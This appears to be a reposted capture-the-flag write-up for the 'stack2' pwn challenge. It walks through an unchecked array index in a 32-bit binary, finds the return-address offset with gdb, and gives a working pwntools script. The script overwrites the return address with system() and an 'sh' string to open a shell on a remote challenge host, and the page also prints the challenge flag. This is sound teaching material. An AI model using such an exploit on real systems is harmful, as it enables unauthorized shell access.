pwn stack2

Others 2020-09-25 19:17:35 views: null

Drag in the 32-bit ida and
Insert picture description here
analyze it roughly. This program is that you can save some numbers in it, and then choose to display the numbers, add numbers and other operations. This question I learned a new and more hidden loophole: array overflow,
Insert picture description here
look here, When we select the 3, add number option, although the v13 array defines 100, there is no detection for v5. In this way, we can modify any number, including data outside of 100. We can use this One point, change the return address and other parameters
Insert picture description here
. The hackhere here is not available, but here is the system function. We only need to find sh and pass it to the system function.
Insert picture description here
Next we will find the location where the first parameter of v13 is stored,
Insert picture description here
var_88 It is the first number we input, and seeing that it is finally stored in the address stored in eax, we can debug with gdb, and the breakpoint is at 0x080486d5, and then run, and see what the address stored in eax at this time is What
input b *0x080486d5, r, 1, 1 in turn

Insert picture description here
The
same is true for 0xffffcfc8 in eax . Look at the return address
esp at the end of the program runs to the top of the stack. When the program ends, esp points to the return address.
Insert picture description here
This time it is broken here, 0x080488f2

Insert picture description here
esp, 0xffffd04c, minus one, the 0x84
code is as follows

from pwn import *

def send_num(addr,num):
 	sh.sendlineafter("5. exit","3")
 	sh.sendlineafter("which number to change:",str(addr))
 	sh.sendlineafter("new number:",str(num))
sh=remote('111.198.29.45',39250)
sh.sendlineafter("How many numbers you have:","1")
sh.sendlineafter("Give me your numbers","1")

send_num(0x84,0x50)
send_num(0x85,0x84)
send_num(0x86,0x04)
send_num(0x87,0x08)
#注意这里是0x8c
send_num(0x8c,0x87)
send_num(0x8d,0x89)
send_num(0x8e,0x04)
send_num(0x8f,0x08)

sh.sendline("5")
sh.interactive()

We go to the first number 0x84, which is the return address, and pass in the address 0x08048450 of the system function. There is no need to consider the four bytes in the middle, and then pass the address 0x08048987'sh' as ​​a parameter to the function system
flag : Cyberpeace{1ba810e17403a9004cd8a5997c5eb110}
Insert picture description here

Guess you like

Origin blog.csdn.net/weixin_45677731/article/details/104868116
pwn
Recommended
Arc Browser for Windows 1.0 officially GA
A programmer born in the 1990s developed a video porting software and made over 7 million in less than a year. The ending was very punishing!
Ranking
1. Select Sort
Create a thread thread
3 press to play ball that reach 6
Programmation CUDA (4) : gestion de la mémoire
SpringBoot database connection pool Druid error
E Diudiu App redesign summary
4EVERLAND Hosting now supports SNS+IPFS
About HTTPS
[vue3+vite+ts+element-plu+sass] uses bug records in sass
Interpretation of HUAWEI CLOUD GaussDB (for Influx): Best Practice Data Modeling
Daily
More
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)

Code World

© 2018 codetd.com